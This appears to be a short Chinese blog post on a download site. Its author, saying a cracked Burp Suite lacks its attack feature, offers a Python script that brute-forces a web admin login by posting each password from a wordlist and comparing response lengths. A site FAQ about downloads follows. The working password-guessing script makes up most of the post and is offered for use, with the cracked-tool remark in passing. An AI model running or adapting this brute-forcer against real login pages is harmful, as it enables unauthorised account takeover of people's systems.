某天晚上,看到某SRC公众号发了推文,想着赶紧撸一波漏洞,已经好久没有挖洞的我,赶紧打开了我的burpsuite神器,然而抓包一套流程下来,发现并没有attack按钮?破解burpsuite的大神表示不再维护,所以自己写了一个简单的python脚本

立一个FLAG,下次一定完善这个爆破脚本

TASK:

  • 支持POST爆破
  • 支持类似burp一样的变量识别
  • 支持字段排列组合
  • 支持数据包对比、排序

能用的脚本如下:


import requests
url="https://blog.dyboy.cn/admin/"
n=1
username=input("请输入用户名")
data2={'username':username,'password':'00000000','Login':'Login'}
headers={'cookie':'name=dyboy'}
response2=requests.post(url,data2,headers=headers)
text2=response2.text
f=open("pass.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.post(url,data1,headers=headers)
    text1=response1.text
    print("第:", n, "次,尝试密码:", password, "HTTP包长度:", len(text1))
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break

常见问题FAQ

点击下载链接不跳转怎么回事?
您好,QQ内打开是不跳转的,一少部分浏览器也不跳转,一般的UC了,搜狗 360等浏览器都可以跳转。
免费下载或者贵宾会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 《免责声明》。
可以直接把资源发给我吗?
您好,付费资源可以直接把链接发送给您,免费资源不提供任何帮助,软件资源自测,或者请站长喝红牛!

发表评论

立即查看